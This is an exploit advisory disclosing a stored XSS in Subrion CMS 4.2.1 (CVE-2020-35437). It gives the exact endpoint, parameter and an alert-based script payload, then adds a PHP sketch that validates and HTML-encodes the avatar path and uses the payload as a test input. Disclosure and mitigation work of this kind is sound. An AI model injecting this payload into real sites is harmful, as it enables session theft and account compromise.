Subrion CMS 4.2.1 – ‘avatar[path]’ XSS

  • Author: icekam
    Date: 2021-01-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49346/
  • # Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS
    # Date: 2020-12-15
    # Exploit Author: icekam
    # Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>
    # Software Link: https://github.com/intelliants/subrion
    # Version: Subrion CMS 4.2.1
    # CVE : CVE-2020-35437
    
    Stored XSS vulnerability in /_core/profile/.
    Reproduce through the avatar[path] parameter in a POST request to the /_core/profile/ URL.
    Payload: "><sCrIpT>alert(1)</sCrIpT>
    
    https://github.com/intelliants/subrion/issues/880
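
A defensive sketch for the issue described above, added here and not taken from Subrion or the advisory. It assumes the stored avatar[path] value is later echoed inside an HTML attribute (which the `">` prefix of the payload suggests); the function names, the allowed path pattern and the `/uploads/` prefix are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not Subrion's own code.

// Input side: accept only a relative path built from safe characters and
// ending in an image extension. Character set and extensions are assumptions.
function validate_avatar_path(string $path): ?string
{
    if (strlen($path) > 255) {
        return null;
    }
    $pattern = '#\A[A-Za-z0-9_\-]+(?:/[A-Za-z0-9_\-]+)*\.(?:jpe?g|png|gif)\z#';
    if (!preg_match($pattern, $path)) {
        return null;
    }
    return $path;
}

// Output side: encode for an HTML attribute context. ENT_QUOTES encodes both
// quote styles, so the value cannot close the src attribute or the tag.
function render_avatar(string $storedPath): string
{
    $safe = htmlspecialchars($storedPath, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // '/uploads/' is an assumed base path for this sketch.
    return '<img class="avatar" src="/uploads/' . $safe . '" alt="avatar">';
}

// Constructed inputs: one ordinary path and the payload quoted in the advisory.
$samples = [
    'a/admin/avatar_1.jpg',
    '"><sCrIpT>alert(1)</sCrIpT>',
];

foreach ($samples as $input) {
    $accepted = validate_avatar_path($input);
    echo 'input:    ', $input, PHP_EOL;
    echo 'stored:   ', $accepted === null ? '(rejected)' : $accepted, PHP_EOL;
    // Encoding is applied regardless of validation, so a value that reached
    // storage by another route still stays inside the attribute when rendered.
    echo 'rendered: ', render_avatar($input), PHP_EOL, PHP_EOL;
}
```

Validation on write and encoding on render are independent controls: the first keeps malformed values out of the profile record, the second protects pages that display records stored before the check existed.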